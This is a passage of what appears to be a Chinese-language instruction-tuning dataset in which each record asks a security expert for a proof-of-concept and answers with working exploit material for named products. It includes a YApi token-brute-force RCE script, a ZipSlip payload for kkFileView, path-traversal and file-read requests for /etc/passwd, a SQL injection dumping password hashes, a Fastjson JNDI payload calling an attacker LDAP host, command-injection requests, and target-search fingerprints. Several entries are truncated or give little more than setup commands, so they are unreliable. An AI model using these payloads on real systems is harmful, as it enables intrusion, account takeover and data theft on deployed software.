'col_id', type=int, required=True)\n@click.option('-c', '--command', 'command', type=str, required=True, help='Command that you want to execute')\ndef cmd_rce(url, owner, token, project_id, col_id, command):\n    token = aes_encode(f'{owner}|{token}')\n    project = find_project(url, token, project_id)\n    if not project:\n        click.echo('[-] failed to get project')\n        return False\n\n    old_after_script = project.get('after_script', '')\n    if not update_project(url, token, project_id, command):\n        click.echo('[-] failed to update project')\n        return False\n\n    output = run_auto_test(url, token, col_id)\n    if output:\n        click.echo(output)\n        clear_project(url, token, project_id, old_after_script)\n        return True\n\n    clear_project(url, token, project_id, old_after_script)\n    return False\n\n\n@cli.command('one4all')\n@click.option('-u', '--url', type=str, required=True)\n@click.option('--count', type=int, default=5)\n@click.option('-c', '--command', type=str, default='id')\ndef cmd_one4all(url, count, command):\n    already = []\n    for i in range(count):\n        token = brute_token(url, already)\n        if not token:\n            logger.info('[-] no new token found, exit...')\n            break\n\n        already.append(token)\n        logger.info('[+] find a new token: %s', token)\n        owner_id = find_owner_uid(url, token)\n        if not owner_id:\n            logger.info('[-] failed to find the owner id using token %s', token)\n            continue\n\n        etoken = aes_encode(f'{owner_id}|{token}')\n        logger.info('[+] find a new owner id: %r, encrypted token: %s', owner_id, etoken)\n        project = find_project(url, etoken)\n        if not project:\n            logger.info('[-] failed to find project using token %s', token)\n            continue\n\n        project_id = project['_id']\n        logger.info('[+] project_id = %s, project = %r', project_id, project)\n        col_ids = find_col(url, etoken, 1, 200)\n        if not col_ids:\n            logger.info('[+] failed to find cols in project %s, try next project...', project_id)\n\n        for col_id in col_ids:\n            logger.info('[+] col_id = %s', col_id)\n            click.echo(f'hit: project_id: {project_id} | owner_id: {owner_id} | col_id: {col_id} | token: {token}')\n            click.echo(f'suggestion: python {sys.argv[0]} rce -u {url} -t {token} -o {owner_id} --pid {project_id} --cid {col_id} --command=\"{command}\"')\n\n            if cmd_rce.callback(url, owner_id, token, project_id, col_id, command):\n                return\n\n\nif __name__ == '__main__':\n    cli()\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/YApi NoSQL注入导致远程命令执行漏洞.md"}
    650. 

  650. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:TerraMaster TOS 后台任意文件读取漏洞 CVE-2020-28187\n漏洞描述:TerraMaster TOS <= 4.2.06中的多个目录遍历漏洞允许远程身份验证的攻击者通过/tos/index.php?editor/fileGet路径下的filename参数、 /include/ajax/logtable.php路径下的Event参数和/include/core/index.php路径下的opt参数,读取文件系统中的任何文件。\n影响版本:``` TerraMaster TOS < 4.2.06 ```\n网络测绘:``` \"TerraMaster\" && header=\"TOS\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2020-28187\n【POC利用方法】\n1. TerraMaster TOS < 4.2.06\n2. \"TerraMaster\" && header=\"TOS\"\n3. /tos/index.php?editor/fileGet&filename=../../../../../../etc/passwd\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/TerraMaster TOS 后台任意文件读取漏洞 CVE-2020-28187.md"}
    651. 

  651. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:kkFileView ZipSlip 远程命令执行漏洞\n漏洞描述:kkFileView 是使用 Spring Boot 搭建的文档在线预览解决方案,能够支持多种主流办公文档的在线预览,如 doc、docx、xls、xlsx、ppt、pptx、pdf、txt、zip、rar 等格式。此外,还可以预览图片、视频、音频等多种类型的文件。 在 kkFileView 4.4.0-beta 以前,存在一处 ZipSlip 漏洞。攻击者可以利用该漏洞,向服务器任意目录下写入文件,导致任意命令执行漏洞。 参考链接: - https://github.com/kekingcn/kkFileView/issues/553 - https://github.com/luelueking/kkFileView-v4.3.0-RCE-POC\n影响版本:``` v4.2.0 <= kkFileView <= v4.4.0-beta ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. v4.2.0 <= kkFileView <= v4.4.0-beta\n2. docker compose up -d\n3. import zipfile\n\nif __name__ == \"__main__\":\n    try:\n        binary1 = b'vulhub'\n        binary2 = b\"import os\\nos.system('touch /tmp/success')\\n\"\n        zipFile = zipfile.ZipFile(\"test.zip\", \"a\", zipfile.ZIP_DEFLATED)\n        # info = zipfile.ZipInfo(\"test.zip\")\n        zipFile.writestr(\"test\", binary1)\n        zipFile.writestr(\"../../../../../../../../../../../../../../../../../../../opt/libreoffice7.5/program/uno.py\", binary2)\n        zipFile.close()\n    except IOError as e:\n        raise e\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/kkFileView ZipSlip 远程命令执行漏洞.md"}
    652. 

  652. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:会捷通云视讯 fileDownload 任意文件读取漏洞\n漏洞描述:会捷通云视讯 fileDownload 存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器上的任意文件\n影响版本:``` 会捷通云视讯 ```\n网络测绘:``` body=\"/him/api/rest/v1.0/node/role\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. body=\"/him/api/rest/v1.0/node/role\"\n2. POST /fileDownload?action=downloadBackupFile HTTP/1.1\nHost: \nContent-Length: 24\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nReferer: http://36.99.45.142:9090/fileDownload?action=downloadBackupFile\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6\n\nfullPath=%2Fetc%2Fpasswd\n3. Content-Length: 24\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/会捷通云视讯 fileDownload 任意文件读取漏洞.md"}
    653. 

  653. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Atlassian Confluence server-info.action 登陆绕过漏洞 CVE-2023-22515\n漏洞描述:Atlassian Confluence 是 Atlassian 开发的一款建基于网络企业维基 (collaboration software) 的软件。 Atlassian Confluence 数据中心和服务器存在漏洞,利用 /server-info.action 端点传递 bootstrapStatusProvider.applicationConfig.setupComplete 参数,使服务器处于安装未完成状态,以访问受限制的端点并创建未经授权的 Confluence 管理员帐户,登录 Confluence 实例后台。\n影响版本:Atlassian Confluence\n网络测绘:``` app=\"ATLASSIAN-Confluence\" ``` ``` title==\"登录 - Confluence\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2023-22515\n【POC利用方法】\n1. app=\"ATLASSIAN-Confluence\"\n2. title==\"登录 - Confluence\"\n3. GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1\nHost: \nAccept: */*\nContent-Type: application/x-www-form-urlencoded\nX-Atlassian-Token: no-check\nAccept-Encoding: gzip\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Atlassian Confluence server-info.action 登陆绕过漏洞 CVE-2023-22515.md"}
    654. 

  654. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:1Panel loadfile 后台文件读取漏洞\n漏洞描述:1Panel 是一个现代化、开源的Linux 服务器运维管理面板。 1Panel 后台存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感信息文件\n影响版本:1Panel\n网络测绘:``` \"1Panel\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. POST /api/v1/file/loadfile\n\n{\"paht\":\"/etc/passwd\"}\n2. {\"paht\":\"/etc/passwd\"}\n3. POST /api/v1/file/loadfile\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/1Panel loadfile 后台文件读取漏洞.md"}
    655. 

  655. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Scrapyd 未授权访问漏洞\n漏洞描述:scrapyd是爬虫框架scrapy提供的云服务,用户可以部署自己的scrapy包到云服务,默认监听在6800端口。如果攻击者能访问该端口,将可以部署恶意代码到服务器,进而获取服务器权限。 参考链接: - https://www.leavesongs.com/PENETRATION/attack-scrapy.html\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. docker-compose up -d\n2. $ pip install scrapy scrapyd-client\n$ scrapy startproject evil\n$ cd evil\n3. import os\n\nos.system('touch awesome_poc')\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Scrapyd 未授权访问漏洞.md"}
    656. 

  656. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Jeecg jeecgFormDemoController JNDI 代码执行漏洞 CVE-2023-49442\n漏洞描述:Jeecg 4.0及之前版本中,由于 /api 接口鉴权时未过滤路径遍历,攻击者可构造包含 `../` 的url绕过鉴权。攻击者可构造恶意请求利用 `jeecgFormDemoController.do?interfaceTest` 接口进行 jndi 注入攻击,实现远程代码执行。 Jeecg(J2EE Code Generation)是开源的代码生成平台,目前官方已停止维护。注:Jeecg 与 Jeecg-boot 非相同应用。 参考链接: - https://xz.aliyun.com/t/13283\n影响版本:``` Jeecg <= 4.0 ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2023-49442\n【POC利用方法】\n1. Jeecg <= 4.0\n2. /api/../jeecgFormDemoController.do?interfaceTest=\n3. {\n\t\"a\": {\n\t\t\"@type\": \"java.lang.Class\",\n\t\t\"val\": \"com.sun.rowset.JdbcRowSetImpl\"\t\n\t},\n\t\"b\": {\n\t\t\"@type\": \"com.sun.rowset.JdbcRowSetImpl\",\n\t\t\"dataSourceName\": \"ldap://<your-vps-ip>:1389/Basic/TomcatEcho\",\n\t\t\"autoCommit\": true\n\t}\n}\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Jeecg jeecgFormDemoController JNDI 代码执行漏洞 CVE-2023-49442.md"}
    657. 

  657. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Adminer ElasticSearch 和 ClickHouse 错误页面SSRF漏洞 CVE-2021-21311\n漏洞描述:Adminer是一个PHP编写的开源数据库管理工具,支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等数据库。 在其4.0.0到4.7.9版本之间,连接 ElasticSearch 和 ClickHouse 数据库时存在一处服务端请求伪造漏洞(SSRF)。 参考连接: - https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6 - https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf - https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-21311.yaml\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2021-21311\n【POC利用方法】\n1. docker compose up -d\n2. - https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-21311.yaml\n3. 服务启动后,在`http://your-ip:8080`即可查看到Adminer的登录页面。\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Adminer ElasticSearch 和 ClickHouse 错误页面SSRF漏洞 CVE-2021-21311.md"}
    658. 

  658. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:TamronOS IPTV系统 submit 任意用户创建漏洞\n漏洞描述:TamronOS IPTV系统 /api/manager/submit 存在任意用户创建漏洞,攻击者通过漏洞可以任意用户创建进入后台\n影响版本:``` TamronOS IPTV系统 ```\n网络测绘:``` app=\"TamronOS-IPTV系统\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. TamronOS IPTV系统\n2. app=\"TamronOS-IPTV系统\"\n3. /api/manager/submit?group=1&username=test&password=123456\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/TamronOS IPTV系统 submit 任意用户创建漏洞.md"}
    659. 

  659. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:广联达 Linkworks GetIMDictionary SQL注入漏洞\n漏洞描述:广联达 Linkworks办公OA GetIMDictionary接口存在SQL注入漏洞,发送请求包后可以获取数据库中的敏感信息\n影响版本:广联达 Linkworks\n网络测绘:``` web.body=\"/Services/Identification/\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. web.body=\"/Services/Identification/\"\n2. // GTP.IM.Services.Config.WebSite.WebService.IM.Config.ConfigService\n// Token: 0x06000018 RID: 24 RVA: 0x00004148 File Offset: 0x00002348\n[WebMethod(Description = \"得到IM系统配置\")]\npublic string GetIMDictionary(string key)\n{\n\tstring str = string.Empty;\n\tISysConfigService service = ServiceFactory.GetService<ISysConfigService>();\n\tStringBuilder stringBuilder = new StringBuilder();\n\tstringBuilder.AppendFormat(\"select F_VALUE from T_IM_DICTIONARY where f_key='{0}';\", key);\n\tDataSet dataSet = GSqlDataAccess.SelectDataSet(service.DataSourceName, stringBuilder.ToString(), new DataParameter[0]);\n\tif (dataSet != null && dataSet.Tables.Count > 0 && dataSet.Tables[0] != null)\n\t{\n\t\tforeach (object obj in dataSet.Tables[0].Rows)\n\t\t{\n\t\t\tDataRow dataRow = (DataRow)obj;\n\t\t\tstr = dataRow[\"F_VALUE\"].ToString();\n\t\t}\n\t}\n\tStringBuilder stringBuilder2 = new StringBuilder();\n\tstringBuilder2.Append(\"<?xml version=\\\"1.0\\\" encoding=\\\"utf-8\\\"?>\");\n\tstringBuilder2.Append(\"<result  value=\\\"\" + str + \"\\\" >\");\n\tstringBuilder2.Append(\"</result>\");\n\treturn stringBuilder2.ToString();\n}\n3. POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1\nHost: \nContent-Type: application/x-www-form-urlencoded\n\nkey=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/广联达 Linkworks GetIMDictionary SQL注入漏洞.md"}
    660. 

  660. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Atlassian Confluence 路径穿越与命令执行漏洞 CVE-2019-3396\n漏洞描述:Atlassian Confluence是企业广泛使用的wiki系统,其6.14.2版本前存在一处未授权的目录穿越漏洞,通过该漏洞,攻击者可以读取任意文件,或利用Velocity模板注入执行任意命令。 参考资料: - https://paper.seebug.org/884/ - https://jira.atlassian.com/browse/CONFSERVER-57974\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2019-3396\n【POC利用方法】\n1. docker-compose up -d\n2. POST /rest/tinymce/1/macro/preview HTTP/1.1\nHost: 192.168.174.128:8090\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\nConnection: close\nReferer: http://192.168.174.128:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&\nContent-Type: application/json; charset=utf-8\nContent-Length: 176\n\n{\"contentId\":\"786458\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":{\"url\":\"https://www.viddler.com/v/23464dc6\",\"width\":\"1000\",\"height\":\"1000\",\"_template\":\"../web.xml\"}}}\n3. python3 -m pip install pyftpdlib\npython3 -m pyftpdlib -p 8888\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Atlassian Confluence 路径穿越与命令执行漏洞 CVE-2019-3396.md"}
    661. 

  661. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Atlassian Confluence preview SSTI模版注入漏洞 CVE-2019-3396\n漏洞描述:Confluence是一个专业的企业知识管理与协同软件,常用于构建企业wiki。 利用该漏洞可以读取服务器上任意文件,进而可以包含恶意文件来执行代码。可能造成敏感信息泄露,服务器被控制等严重后果。\n影响版本:``` Atlassian Atlassian Confluence < 6.6.12 Atlassian Atlassian Confluence 6.7.0-6.12.2 Atlassian Atlassian Confluence < 6.13.3 Atlassian Atlassian Confluence < 6.14.2 ```\n网络测绘:``` app=\"ATLASSIAN-Confluence\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2019-3396\n【POC利用方法】\n1. Atlassian Atlassian Confluence < 6.6.12\nAtlassian Atlassian Confluence 6.7.0-6.12.2\nAtlassian Atlassian Confluence < 6.13.3\nAtlassian Atlassian Confluence < 6.14.2\n2. app=\"ATLASSIAN-Confluence\"\n3. POST /rest/tinymce/1/macro/preview HTTP/1.1\nHost: \nConnection: close\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3670.0 Safari/537.36\nContent-Type: application/json; charset=utf-8\nContent-Length: 168\n\n{\"contentId\":\"786457\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":{\"url\":\"https://www.viddler.com/v/23464dc5\",\"width\":\"1000\",\"height\":\"1000\",\"_template\":\"file:///etc/passwd\"}}}\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Atlassian Confluence preview SSTI模版注入漏洞 CVE-2019-3396.md"}
    662. 

  662. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:GhostScript 沙箱绕过(命令执行)漏洞 CVE-2018-19475\n漏洞描述:2018年底来自Semmle Security Research Team的Man Yue Mo发表了CVE-2018-16509漏洞的变体CVE-2018-19475,可以通过一个恶意图片绕过GhostScript的沙盒,进而在9.26以前版本的gs中执行任意命令。 参考链接: - https://blog.semmle.com/ghostscript-CVE-2018-19475/ - https://bugs.ghostscript.com/show_bug.cgi?id=700153\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2018-19475\n【POC利用方法】\n1. docker-compose up -d\n2. 将POC作为图片上传,执行命令`id > /tmp/success && cat /tmp/success`:\n3. - https://blog.semmle.com/ghostscript-CVE-2018-19475/\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/GhostScript 沙箱绕过(命令执行)漏洞 CVE-2018-19475.md"}
    663. 

  663. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Alibaba Nacos secret.key默认密钥 未授权访问漏洞\n漏洞描述:Alibaba Nacos 使用了固定的secret.key默认密钥,导致攻击者可以构造请求获取敏感信息,导致未授权访问漏洞\n影响版本:``` Alibaba Nacos <= 2.2.0 ```\n网络测绘:``` app=\"NACOS\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. Alibaba Nacos <= 2.2.0\n2. app=\"NACOS\"\n3. /nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ&pageNo=1&pageSize=9\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Alibaba Nacos secret.key默认密钥 未授权访问漏洞.md"}
    664. 

  664. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Nexus Repository Manager 3 extdirect 远程命令执行漏洞 CVE-2019-7238\n漏洞描述:Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在未授权访问漏洞,将可以导致任意命令执行漏洞。 参考链接: - https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019 - https://xz.aliyun.com/t/4136 - https://www.anquanke.com/post/id/171116 - http://commons.apache.org/proper/commons-jexl/\n影响版本:``` Nexus < 3.14.0 ```\n网络测绘:``` app=\"Nexus-Repository-Manager\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2019-7238\n【POC利用方法】\n1. Nexus < 3.14.0\n2. app=\"Nexus-Repository-Manager\"\n3. docker-compose up -d\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Nexus Repository Manager 3 extdirect 远程命令执行漏洞 CVE-2019-7238.md"}
    665. 

  665. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:SolarView Compact 命令注入漏洞 CVE-2022-40881\n漏洞描述:Contec SolarView Compact是日本Contec公司的一个应用系统。提供光伏发电测量系统。Contec SolarView Compact 6.00版本存在安全漏洞,攻击者利用该漏洞可以通过 network_test.php 的命令注入攻击。\n影响版本:``` SolarView Compact 6.00 ```\n网络测绘:``` body=\"SolarView Compact\" && title==\"Top\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2022-40881\n【POC利用方法】\n1. SolarView Compact 6.00\n2. body=\"SolarView Compact\" && title==\"Top\"\n3. POST /cgi-bin/network_test.php HTTP/1.1\nHost: x.x.x.x\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.97 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 44\n\nhost=%0acat${IFS}/etc/passwd%0a&command=ping\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/SolarView Compact 命令注入漏洞 CVE-2022-40881.md"}
    666. 

  666. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Smartbi 远程命令执行漏洞\n漏洞描述:Smartbi 大数据分析平台存在远程命令执行漏洞,未经身份认证的远程攻击者可利用 stub 接口构造请求绕过补丁限制,进而控制 JDBC URL,最终可导致远程代码执行或信息泄露。\n影响版本:``` v7 <= Smartbi <= v10.5.8 ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. v7 <= Smartbi <= v10.5.8\n2. POST /smartbi/vision/RMIServlet?windowUnloading=&%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%\n3. 目前厂商已发布升级补丁以修复漏洞,补丁获取链接:https://www.smartbi.com.cn/patchinfo\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Smartbi 远程命令执行漏洞.md"}
    667. 

  667. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Atlassian Bitbucket archive 远程命令执行漏洞 CVE-2022-36804\n漏洞描述:Atlassian 发布安全公告,披露了 Bitbucket Server 和 Data Center 在 7.0.0 版中引入了一个严重安全漏洞。 Bitbucket 是 Atlassian 公司提供的一个基于 web 的版本库托管服务,支持 Mercurial 和 Git 版本控制系统。支持私有化部署,根据国内某资产测绘平台数据显示,近一年全球有超过 1w+ 相关服务对外开放。 官方漏洞公告中描述 Bitbucket Server 和 Data Center 多个 API 端点存在命令注入漏洞,漏洞触发条件是攻击者具备公开项目的访问权限或者私有项目的可读权限,影响版本从 7.0 到 8.3\n影响版本:``` Atlassian Bitbucket 7.0~8.3 ```\n网络测绘:``` app=\"ATLASSIAN-Bitbucket\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2022-36804\n【POC利用方法】\n1. Atlassian Bitbucket 7.0~8.3\n2. app=\"ATLASSIAN-Bitbucket\"\n3. /rest/api/latest/projects/BIZEE/repos/bizee-communication-api/archive?filename=wN3Am&at=wN3Am&path=wN3Am&prefix=ax%00--exec=%60id%60%00--remote=origin\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Atlassian Bitbucket archive 远程命令执行漏洞 CVE-2022-36804.md"}
    668. 

  668. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:EasyImage down.php 任意文件读取漏洞\n漏洞描述:EasyImage down.php 文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器任意文件\n影响版本:``` EasyImage ```\n网络测绘:``` app=\"EasyImage-简单图床\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. app=\"EasyImage-简单图床\"\n2. /application/down.php?dw=./config/config.php\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/EasyImage down.php 任意文件读取漏洞.md"}
    669. 

  669. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:深信服 应用交付报表系统 download.php 任意文件读取漏洞\n漏洞描述:深信服 应用交付报表系统 download.php文件存在任意文件读取漏洞,攻击者通过漏洞可以下载服务器任意文件\n影响版本:``` 深信服 应用交付报表系统 ```\n网络测绘:``` app=\"SANGFOR-应用交付报表系统\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 深信服 应用交付报表系统\n2. app=\"SANGFOR-应用交付报表系统\"\n3. /report/download.php?pdf=../../../../../etc/passwd\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/深信服 应用交付报表系统 download.php 任意文件读取漏洞.md"}
    670. 

  670. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:JD-FreeFuck 后台命令执行漏洞\n漏洞描述:JD-FreeFuck 存在后台命令执行漏洞,由于传参执行命令时没有对内容过滤,导致可以执行任意命令,控制服务器 项目地址: https://github.com/meselson/JD-FreeFuck\n影响版本:``` JD-FreeFuck ```\n网络测绘:``` title=\"京东薅羊毛控制面板\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. JD-FreeFuck\n2. title=\"京东薅羊毛控制面板\"\n3. POST /runCmd HTTP/1.1\nHost: 101.200.189.251:5678\nContent-Length: 50\nPragma: no-cache\nCache-Control: no-cache\nAccept: */*\nX-Requested-With: XMLHttpRequest\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6\nCookie: connect.0.6356777726800276=s%3Av1W6DxlSqnPpVgvMCItxElFeKI1Psh4i.eE4ORs0Yz30N0TOg1pUVpOqrpIHyrqIimuXJVO8lE7U\nConnection: close\n\ncmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/JD-FreeFuck 后台命令执行漏洞.md"}
    671. 

  671. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:MLflow get-artifact 任意文件读取漏洞 CVE-2023-1177\n漏洞描述:使用 MLflow 模型注册表托管 MLflow 开源项目的用户 mlflow server或者 mlflow ui使用早于 MLflow 2.2.1 的 MLflow 版本的命令如果不限制谁可以查询其服务器(例如,通过使用云 VPC、入站请求的 IP 白名单或身份验证 /授权中间件)。 此问题仅影响运行 mlflow server和 mlflow ui命令。 不使用的集成 mlflow server或者 mlflow ui不受影响; 例如,Azure Machine Learning 上的 Databricks Managed MLflow 产品和 MLflow 不使用这些命令,并且不会以任何方式受到这些漏洞的影响。\n影响版本:``` MLflow < 2.2.1 ```\n网络测绘:``` app.name=\"MLflow\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2023-1177\n【POC利用方法】\n1. MLflow < 2.2.1\n2. app.name=\"MLflow\"\n3. POST /ajax-api/2.0/mlflow/registered-models/create\nContent-Type: application/json\n\n{\"name\": \"testfile\"}\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/MLflow get-artifact 任意文件读取漏洞 CVE-2023-1177.md"}
    672. 

